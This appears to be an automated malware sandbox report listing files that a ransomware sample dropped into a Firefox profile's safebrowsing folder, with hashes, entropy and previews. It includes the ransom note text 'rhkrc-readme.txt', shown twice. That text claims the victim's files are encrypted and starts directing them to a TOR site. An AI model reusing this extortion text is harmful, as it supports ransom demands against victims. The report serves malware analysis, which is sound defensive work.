                  Preview: .x...........Ug ...w.5.z.i. ......]@.X..c,..q...^....N.....E?h..P.....J.....L....80.i@\...Cy."*..b,6..~8.].jx..5.?^|3...M.zA?f.._...:.}.>..e5=....5.[..h....6,p..\..Jnk`..k.E%.H..n.....8._YS.,q3.x....@.n0.......j.Q*.L....).\`z...R.|%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................x...).6hh..\.j#/......x/.y...QOe.Q;l...>}..........Ko.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/base-track-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.075442933047978
                  Encrypted:false
                  SSDEEP:3:pcpQxyVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1KNXKFV8ak+4NM/zHlXMT:pcQY1zmhOO/EUyp6XcUNXKFVLw48T
                  MD5:554A4E752998B47B3034661A688FC26E
                  SHA1:7F8DBC116A5F8DF228870A6AC85D1583D4C81CCA
                  SHA-256:C3FCD37282D280B6C60098222B58F35E41D0D01017C13B667ACBB719E90A11BE
                  SHA-512:14E77F008AE8DD8FA3B181B8F70A20CB7B59DAF1C5448483752AEDD92E8F7F26120F0167D1AAF2492944C2181DCA50BC11E7FE75970BB8851141A4FF4F657A2D
                  Malicious:false
                  Reputation:low
                  Preview: ..}......b.egs..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................9v-.....7Q8t..b..u.`......v?..h......ih...N.........3..X
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/base-track-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):65120
                  Entropy (8bit):7.996980390664054
                  Encrypted:true
                  SSDEEP:1536:Pwqnh8dwHDMg10IBmUVjNZApOs7LIF7MIrCeaupx1qQW:PF88IqnB39NZwO2IrCeZ15W
                  MD5:A26FD7B141B595C9C5C1FF5A6C1E9E26
                  SHA1:4728CEA65AFC97C864B5DA1E55AED0AF5CD272DC
                  SHA-256:AED3845F88B95CBFADB2031B784984C45C17EF33A79EED1C8702B7C9D6C5E7E5
                  SHA-512:9471578CBD0049844FEC51B132EC7EC6C9A08C71A9658BF6577CD39DF97715E5C964F41F599492B7FFB1BCE8953956B8596B06066714BC89AE6B5772D66830ED
                  Malicious:false
                  Reputation:low
                  Preview: ?...7U\)D...B>..u....v./\.p*.mZ....fuj...*.....V.?}T..a.Y.-....+.$&.V?W.~..{VK)6..5.U....M......o...Xt..z6..k|......^...e.....m......).<. t.....A..Z.a....x..U..6o..........P....-....5g...J...*..l8.x/.Ww....#.....7X.r..l.'.R..X....A?.T T.p..ZP.\.,*Q..g.R.r.).r.....r.s...@.{.Bg..).tF..jr.a.[K...l.q...o"...>d..4...1Ygx.[......=..0.......E....q.(...A6.........Gh..l....x..G...$.Wx1pO<..zN.q,Z.iL..&.*6.s.......N..h...|.Z....,j.......v.fV^.[.....&?.\.j...Z[=.......d#.D(j{.S..%%$'.....D...........i...2t:....}...8...........W0.f.....Q..X..0..f..{....}..}N...i.%#...O........q.I..(...Y.@0.nv....B."o...,.-..g.....T/.U.....rM.=.m1.8.K.. &....P.r..%E....j....{W...%m%.B8K?.n...Z...N...~n.6...D./F.....%HG.W.I.o..f.N.).R.|.K..2....q..w^.h&..Nw<.lEA..B..j.M..G..W.eP>........y..;....p..`.;9lY..c.+...|F.+.....cx..Ym(g...R....6...E.+.u.....@n...c)n..`|........i....?.f...cL.o+..=......{s.}.2L..$.l....2.].;d;x.3.... ...$.5..U...dk....2.9`.6Z8.xC..9+..]g....ANxMHh..Q........q7@I...X.qX...F..f..Ti..S.........^
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flash-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.070280601915892
                  Encrypted:false
                  SSDEEP:3:oUv/gTJykDuHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1A2HqHKDJDRq/wyr/t:oUvYT8kK11zmhOO/EUyp6Xc+2tJNKV
                  MD5:A93038EF32D46B9096BAF9755030774A
                  SHA1:08AC4A293626D6AB8B58726C93D30751C90CD566
                  SHA-256:C8243301DDCF04307924E2858C31FF8612D17AF0FA84932331ADCFF82811AF1C
                  SHA-512:66D48E8594E24C4EE46484D98EB569DDADCA3CBAF90F780F76BB40DF718E984F0BD63CD2A69963EAC01B824F81E62C4076B9015DAF4A4B2A383B037A9AB8D87A
                  Malicious:false
                  Reputation:low
                  Preview: ..1...r.u...u...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..............................................................................................4.T.....S<..=f4.....ih.s......M.[..,N0............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flash-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7880
                  Entropy (8bit):7.959883077646545
                  Encrypted:false
                  SSDEEP:192:ybEvhvaC3TS+ki5UPKL+2wtkinMzCZJZhR6eLWrGiy:ybEpCOGzi5U92JNzPG3iy
                  MD5:B8FCDF1ADEDC965800078886A6185E96
                  SHA1:2FD4FDE0CB5B1B6C1C125B44F00D6A6C57361F7F
                  SHA-256:22FB5B9FC50BC148513E685E2691AE81E66E3703721B1B55B2516932000EDA85
                  SHA-512:0F854A6B1A2B133D6018F55ADF2461D60F4DB4C6FA435BF0A8D744098C05C918EBEE0E80D9542565C778009FE128ACBD6A74E9390C887EDBEBC289171720DC3E
                  Malicious:false
                  Reputation:low
                  Preview: ..l.q^.....X.....?+.[......:\S.nX"~k)<*..r...m..R..sJ....M...CW.u.0...qmN..gD...u.6LgDU..D.U|...?..J....N...*-..........~..H.2B...E".......i`c...1.u^.W...*.......8BY.n..X3.P.p"..Q.1..[.'2A._ ;.(.k.Y..@w]...h.".....L,......J.."N,...n..T}.=$.;h.(.....+...Y.f..4..o....i}..i=.......L[.k..l...;.........57.LG.r.\... ke.G`Nw.}.Q.q....@./!..e.&.CQx.[.....A....tT....K.yi...G0Ln..Mn.4j.-.v.W.tT.8P...[^f...&.,.3.v...Lc...%.c..|..$......0.F(..G.F..-...I........h.+p0z.h..Cp7-1..F....7..L1GX6...U;S..z.F.......Nkg...M....<^...H.M.I..O\.aT.w..d.....t`.H..V.....9J5u.67..j...aeR......%?ad.{Kq.]..M1.@.%...D+.O...f}..3.2..2.\...}..v.e"?u.3.\..k|...>q8FB.....)W.z.t....#_.(. ...-N.._.....h..S..qr,p......^.J./x....EM..Z;...1=.}.....K...].@..m..8s..7g.8..X.".]+).......Ch=m..x.....k.I.i..9....qU*.h........V..)....OA..}...C......W.........+....3...Y>.s..R..J.VT...h..h.#.........f-r......c.}.E..xnF.....F.=.M.!.4....R].M..1O|X.vD.i.c......Y.M_W..e....o.......U.v &.....wa.4;...*.i.RJ....{.\..., ..Y.g3rc...-..&e...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flashsubdoc-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.092497436610762
                  Encrypted:false
                  SSDEEP:3:Q9lYlO+w6VJvfb7PmWE9CiYa1ESghgEUMzpET77cP1SIMpTndHGyj0a09lRPn:Q9lYg+w+1zmhOO/EUyp6XckzR0a09lpn
                  MD5:4683F9164E12D12D47EF48A2C7B93382
                  SHA1:740613C15DCFFDD6CAC07FA407AFC7D4E984C09F
                  SHA-256:C93F9A373128CE8AD9D8F40AA137BD0183AA8DD4FFAFD920C072F4B9BE622DE8
                  SHA-512:99819FB07A2AB7619B020D7F055BD7F898758CC564AB7F3ADE2949DDB6FBB574C247B09803F4FF235209E6F93B84E0556D11DC696ECDA336993C4EE1DCBC3400
                  Malicious:false
                  Reputation:low
                  Preview: '....=.].....ioJ%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................3^4.........+..84D..W~"..;e=.b!.z.p..x.... ........R..*
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flashsubdoc-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):82976
                  Entropy (8bit):7.997455439181341
                  Encrypted:true
                  SSDEEP:1536:t7M9B54909kAgcFQpPEprVpCcxd+0TQ+anglLCxNfFyzI7RAHm1X/rA:tYl4W0EprVpVd+0DALIAXk
                  MD5:325EE134110B554F0832D8E778DA310E
                  SHA1:752D6EF97A94A038B899A9890FB12769D6E6A9E2
                  SHA-256:95C7D5D569142401FE288BA8CC964133E2BC8D621A80A3AD55B098489420A216
                  SHA-512:D866D8700703588A20D82092339C229D160A1353EFCBEFA95A0EB77E0AF64C978E21833063BB100B5C91FE9F08E567B989B8440DBC6B4A956FC9D56119292124
                  Malicious:false
                  Reputation:low
                  Preview: ....".Hv.......vQ......`..6..Xu......A0.F..{+..OH.C..g^.7.'..5..r.P...{....-.IXnv..h..../.;X|.M.H..\2..#.oR}.v...h..NS.....*........0......{...a.;...V`.p...\...!,.-.?%.Q.f.....h.%......[....c.!..}N......w...eQ....mh..wLi$..6.m.5.r.....}].h..f`^aC.~i.g.\yq...OL..f...........Y._.?M.(......~..kZ.z.[.cg.i F.=...s.R..=..X....b..U3T.^...U.h./..^.zx....28h.D.5......s.{...@.M.. *...,z.y......;U&?.9OCu .\.....T..E.Mu...........wOX.O53.[).....f...:#....|u.G..z.x cj.j..L.(K..$E.......wl3.>..$.x...#@A:..L..............,a1...<j............ZL.b].r!: .{5..G.U..U)(........V....K...?vB......1.........'3.L3X;.T...........Q@.{...U......`d..7a$.d....j..P1O>ci.2V......p3rx..............n<.T].a..4..2D.@#jM........G.3...0.w.8.........q......^...L.q.......X.......g.F[.|d..`}!.T..dn.H"lH1.y...l..%..k)>..o.@T...3..JQ.6!.k2.......j\L..m.......oK{..]AV.4...I.../.`E...^.g.BB......^gZ.).b...E.*...........=....x.w=...........q....U.:...hu.Xd....AOD9].<...cD......S6(...q.h,../......R..=...*.....N.<..V~..|!3{.......g.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flash-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.048205483442481
                  Encrypted:false
                  SSDEEP:3:iIaZjFVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1Nk7DJdcKGB2OlW+7K/nsn:iIaxv1zmhOO/EUyp6Xczc45B28WGn
                  MD5:FC22A0200CB480EDF8DAD7834FC88212
                  SHA1:6313A0A0529331690661C1E86B8AFEB929FFF179
                  SHA-256:FC167FAEC650CEAA8B1D268C75E77241B366C3016BE713FB75A5DA702CE3326C
                  SHA-512:5B83137F4980C4620FC1BD0A84BB838C5081101A6D9903ADA0E3BB778FE24CD108828068F66CBE6FBEB264B7CF5B34628803D1808F37035D2399563BD9D924F7
                  Malicious:false
                  Reputation:low
                  Preview: z5/*.W.M....Z.'.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................Zp?P.........L.l.....>.._XW!..r.&ba..g....)........~..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flash-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):500
                  Entropy (8bit):6.676384886785519
                  Encrypted:false
                  SSDEEP:12:nL4YqLfhNBeJfKe0VqsQq4cqx2DcUBla4:nSr8zqzQ0qx2Dfn
                  MD5:F8B9832329DEC2FDFEF9AADE2A736B6D
                  SHA1:53A370E3EF5C8F487F769634376BC73154933F59
                  SHA-256:70A66AEA104385ED3CC5322D70BB84A2AA5E222EFA1503CF85DF5781BDD82F97
                  SHA-512:FCD506078281B50F5C8901EE47073FA8E7F9816C27231A0DA9C663B6BC52237DB27A051A304C90725BBB53975FA3018CEA19EBD7AC747970F8634937EDC71F60
                  Malicious:false
                  Reputation:low
                  Preview: .....7M.pa.L6...gQ..G...;E2...^.`........>>...9b..;RhkQ..(...O......#.y..T..n.C..G:..Qo...3a....^...#*Q..B..Qj............E"X......\..b^...N.X.....5.k=....`.*_d..........?|]......#.X...L3|.&..^&>&....ba..w6...6]..kt.?.q..tx.#k..Lo....P.[....3.....K)....]..X....:.i..F.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................w.....K.b.{&..A..hW.....<A....*....#....q&..........h..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashallow-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.115362830345922
                  Encrypted:false
                  SSDEEP:3:L//sjX5rHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1ZQeqIKY00yR1JQnltPO:L0jXV11zmhOO/EUyp6XcfQM0HenfO
                  MD5:90F2914F0CC2575A14BF1763BD372B18
                  SHA1:0EF0DF9D1B4CB53F20842CFE0F077399FA21B477
                  SHA-256:DA748ECB178B6FCF96A8F0B65471BFD2349D8086B6A0220C56FC5E697E0E33E9
                  SHA-512:216AFA15E69042B8C389C0D948F6B17E65928E6C51DBC67EB713C655F63FF74B7B95348588A571CAEE4EEC62E434450293F5B3A52D20E4C1DB70E384FC671E40
                  Malicious:false
                  Reputation:low
                  Preview: !..?Se.V..^.....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................eZQ.sZ...Bt..f.^.{Y.Z&Z..|+d..A. 97.w,.vd...........U.k
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashallow-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.586131004387915
                  Encrypted:false
                  SSDEEP:12:MxcrTuRN7IpNWWtkwKAcAsG0XX2DcUBs8efLfO:cHkKtAGXX2DfW3LG
                  MD5:FFBCD425626276D045210161A15E8FF2
                  SHA1:05A1D4E55FD9D46EB564D1354D9C9A8CCF441E30
                  SHA-256:AC9722D66FCB8B29D2E6725FF222385E0041BB7D5B9C993D19310CEB27E1D6DD
                  SHA-512:CDCBEB81A82F48DEF9FDE590B7B3FF925E206DF845E8A5B3A5370897F6722E273CC23EFE4306587584ACA11422A78BFFC976B1BF50E13562ABD6A1E378A97CDC
                  Malicious:false
                  Reputation:low
                  Preview: .......b...d.~T..G......%..\.2.Ggn./z...........].......L`.q.}S].....},..'.......]......O)^.w.nr[..b...X..mm.G:....1.Hs0Wc..$....t?@1I,..w..~.....x......RUW9..*....]Ga'.'...O...7..m"x..r...~h*..H...E%....>.#O{...Cl.K@.L...5...(.r.;.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................E........a...@....M.0..r.?...x._e..Y...G.N.t........P...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashsubdoc-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.075040249700759
                  Encrypted:false
                  SSDEEP:3:UYV5EHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP12/R0p07j4b1rtD7qBbHt/N:/5E11zmhOO/EUyp6Xca0pCjW1riHD
                  MD5:ABB9A4ED0C6FD2982BC48638815338B4
                  SHA1:7CADFE0D6E8FE3C524E784E7C2F1BDA53147EDAB
                  SHA-256:5E4924696C95C1DD6EE4DD479ED542EF308F66CF198F4F34C5B4815B97FD5A25
                  SHA-512:DAFFEE21C31DF8C0D560A279B439BA1619A0D73E9676523FBE88C8231392A6638149B080067EB672966BCA55D5BD53D738F05A714976E7F6953D5AD1E705B293
                  Malicious:false
                  Reputation:low
                  Preview: .1t..ZQ.?.6.Qp..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................H.&......ht.Bp.../\...].-...._...7...-.L.".........]..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashsubdoc-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):536
                  Entropy (8bit):6.873822167024917
                  Encrypted:false
                  SSDEEP:6:xcJa/2uXhLBHBz7pt2q/ffrtxzK6cBA2KMgx80EIQ/V/Kopm11zmhOO/EUyp6XcO:Ea/Dft2AjzzcRKMgxlEhxpmL2DcUBjn
                  MD5:F0FCAE99857701B34E88CD9F5D916BBA
                  SHA1:75DB01A214342B7CB871E6DAE8315AC30EDE99C3
                  SHA-256:D185D264C01CDFF474300C4AF9B4E3C30FB02EB38C4391DE50A064033471CF8D
                  SHA-512:F9AB80BBBD1F296E3D5924B1A953757DACE13ECAD43D543C4A0D5FA915CD661731E7BDFC8BD8165815C6A657691735E2C48840E70A223311494203036DF0D4FE
                  Malicious:false
                  Reputation:low
                  Preview: ......,..4..................#...........smA..Ok.DM.Hg.R..O.*:..L-2Y..O..Ad..,j....|....7.=@.^`...........tH.m...................z.._.6.Hb....v....@f.R.^.............,......%.._.`x......R.}7#..?......Dt* }..#.G.gn4.e.o.x....{..Z.8....)-D..7..:..=..7.<......a..$5...&..O.....B"wYw.v.l.t..4..}.o,.H...L.....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................~:..Qc...ZXv.K.Nr>/...`2...J.>..aK.4...{...........:..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/google4/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozplugin-block-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.107700997564106
                  Encrypted:false
                  SSDEEP:3:RT8wAIeHHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1uNS1mk2VHRcLjHW4Kn:lCjH11zmhOO/EUyp6XcENh/VHRI24K
                  MD5:A63BBF6DADA45D72296B568540B7EC9B
                  SHA1:5ED174D118461062773D41F34CC81FF788F97022
                  SHA-256:D4B580338864CBCEF6F0766C8B3E947A112E8F2BD28A9E0A77EAA8967CDAF84A
                  SHA-512:71001C67920DFCA7DB06363D0C3F27944BC9C8FAF9CEBC54E53E2D6A4DE09C464BFD165FEB3E13396C71791B826D1171B449EBD85AE9689A30A3EC4B8D59EF7F
                  Malicious:false
                  Reputation:low
                  Preview: ]y".....=.P.....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................h...!.$G8k....%.......-1...[......Mon..`]w.........../
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozplugin-block-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3812
                  Entropy (8bit):7.897147106491342
                  Encrypted:false
                  SSDEEP:96:PqOfk53X5mF7IJNWxFpSytwdwPB7SzYc+DDN:isMIEoLtwdwPB7Ov+Dh
                  MD5:4BF52519024807EC6FC6EB588DA46344
                  SHA1:08EC02FFC09DCFE59EBDB463BA260FB71A6FD345
                  SHA-256:EA05E79C8F208F50B2D459AEBFDA4EAD2C5E086F3479E8CFED44A3B799F90351
                  SHA-512:A2831439929C88BCD42007A643E841593479FDBADD491E28E3089A2547DDBA8E3D18936469C306310C0A04E87F58F3B2F8AD9C9C1D1FB0509B6537383A69CA9C
                  Malicious:false
                  Reputation:low
                  Preview: .\....A.hc.........#x...D.L......%Cy.).Y.0.hy-...^\...5.....nhWQ?NXQ....-..reW.....a.B.%..a..k.s....Z..u_s......6q.8^IB.....9~..........^.QS1.|-.3^.%../%.x.j~.Q....@d..n........_...d..U@..Ad.K\E.N.x.I.}d.....%?.^ .....4.].|.....\7....-..'.F...u.h..p...v....Q`.%c...........6..g .5..J......Y.dN...{c...P6J.,/@..^M)......E.........n....`....s42.)........bd.O.(.U%.=.pL,..Wtx,.|...c|...m.I.k..v..Ycb.JH72.....sz}...n.q.#.".....C/{}./...6.....v`..zK..!..h.. .i>!..V...Ct<..F.O..5.p......\P...;w*&U;J..w]......ue..a..`.....9....(;5...@QS....f...Cd.K..E;...,Jf.p{t..sb....5.U..'.p"...P....m..A..F.#..l.UY-x...Ub....n@g..S.Lf....E..v...........W^.:b..k...D...pX.n...>..sO..............h...um.....L..e.$..\<zd9....y....j..Q.1.SK..7>#.p.,..[`.k72.;..S.>.....L....._....?.dYS.U5G..%...7B.... ..7&)I...C................_.X.B.#k....';."...>N....d..H.....u.....#L|.pv*.0..#p.|~.d.u.....v..31..f..>g~..^S.............6..u.>..[...'Y...S*.... ]..D....6....R........P@....n..s....84F...+u.8!s1K0........-[.?q.)..j....
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozstd-trackwhite-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.088125380740424
                  Encrypted:false
                  SSDEEP:3:bnzKv9+flC/DVEHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1MU5P0x4uH7dARXy:DzGSliJE11zmhOO/EUyp6XcF8x4I7V
                  MD5:8C77AC6933039F266E30D28D207B781D
                  SHA1:B85B224FF52FD0263097064E1A0ED49E3C636D8F
                  SHA-256:7E1E1840963EDBE25D959E3B7F441AC6BE3E42CAECA87DD245F9DE2D08DB5CB7
                  SHA-512:F9E195AD89AD83587919CCE81F22636754AA582E26B654B8CAA67E66DD2F9C525AAE040943802DDC8E5B0DBD79B9F74740F8CB6708B9A60A4FB39E9AF6C44AD4
                  Malicious:false
                  Reputation:low
                  Preview: ....o.u.......j@%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................d4.wd....0..p.,.P.v....v.w.".=.e"`.@.L/.Zp..........~J..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozstd-trackwhite-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):326264
                  Entropy (8bit):7.999455811232332
                  Encrypted:true
                  SSDEEP:6144:ZXjWIYybGquUP79CeRyOpw0NkUz/8wo0FcGhK+xLM/Kfh9il8dPPf9OBwRe:AwbGH+oe9pw0uUzEnHsK+xA/K5+8dXfc
                  MD5:807C5ED2175A9AEA81B43044E2BF74A1
                  SHA1:E203AF846604FBD535285A7FD59E1DB50B1B3C74
                  SHA-256:431E34564F92508777FA20C5D23EFB99342AC957C657AD97F535484AFF69671C
                  SHA-512:4FD03049C152A0495006B7377789DB6531B2D1F4ED0BCF3D8FB8AD379AC9A6F452661A3BFF9312A4DC6D5C060FFBB9A12511B227970FF1BF799D7F8E09056E60
                  Malicious:false
                  Reputation:low
                  Preview: .........N1..02.....M.<.f.^.WP./'c...X. ...L.a..Q(.......|le..)...X..z+ZO.....RWS....>....1.v3...7...HU...........<xh... q..q..r.q>......v.(:Zs..E.}m....A..-]...J.0..D....!.....!w....+..(A..R.,.....:..}..^.........~.l7.L.5.;........G........Hh...I..8<.H.O....5..%bE...1bhq.^.nT..d.......@T......g.......n..)....w.f...........~..!.*8...5|c.......q..jr"&k..i.kl<.....M]n@.Q.`.Q..v9....d].Y).(n\..p... J.(>..6.........p.HP...'|..kT.~H...TR%..|ar.U...gL....-..c......Q)\.W.[+..@....s..fX..0...+.jH.C..O...J_.6....F.&a.JsX....Z..A.Y...../]I.'v..,Z......eol.].M.G...[.u.....=.s-{...-..Y....N2tb_}R..$. ..0...-2O.0..m....e.)\..@.]...J...T..V><..P.......sH........^w1.<.A..YP..x.N.|....mxvT..]...J..............p.d....k.Q..[P+..P.U./s....T.....$.....H...8.[.m.U.?..>...<.A9R....S..#$..g.....\..%`^...UG~{.&....uO*.m.......@.n.....7.H...xl...'......;....$....... ...6<.{...;...?...X..Q.i.>$h+...\9...N..`:'..<..I$..LN.h..I.b....G.A.o....{.B.c..PVk.........+.3...9.x-9)P.G .&-.fa.pc..B.>............".b.R+1....
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-block-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.055926593708369
                  Encrypted:false
                  SSDEEP:3://HzoK7G2VJvfb7PmWE9CiYa1ESghgEUMzpET77cP1nlumT3H4X99ufun//x:3HzJ1zmhOO/EUyp6XcOmT3YX9MG/J
                  MD5:3130C4C895696181D1D44D8BF78D0434
                  SHA1:42290439C3F792CBFDFD72AB3FA0D56BA5BB924B
                  SHA-256:D43CDC7A7670D201982482B69E664B6DF8681D583C19174C40410D063D47C857
                  SHA-512:03C445FACE5765F1DB838C60F68480DC97D23D5306C3BC3EE6195783127E10C454CF74235D8D9F5E0EB6596F5C44A8E2629A15D161BC752AC645AAE8F6DC604D
                  Malicious:false
                  Reputation:low
                  Preview: ....xC...G%.F9..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................{n..@U/.....kSBa...R.:....r.8.......t..U..K8.........Q..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-block-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.623308172308201
                  Encrypted:false
                  SSDEEP:12:EgMCR28JuWTeI45ULj31ZN1kz2GO2DcUBRbc:b/3eI45ULj3zN1AO2Df0
                  MD5:A8A0051895C5832EA9C760BEECD443C3
                  SHA1:A1695727C9754862B7DAA8C755E44F8C6588BB65
                  SHA-256:55E7397521280727D3D120EF7389A2E38C01844B443B3566412F92D1837810E4
                  SHA-512:7C5449629D51590293B2D34ED091DD7FDDD56BBFFC47E5F0DB268FA276B9D0D1041C82C204B1167211E54BC32317119C4A89F962EB782D0575A3F1FB9A662DF5
                  Malicious:false
                  Reputation:low
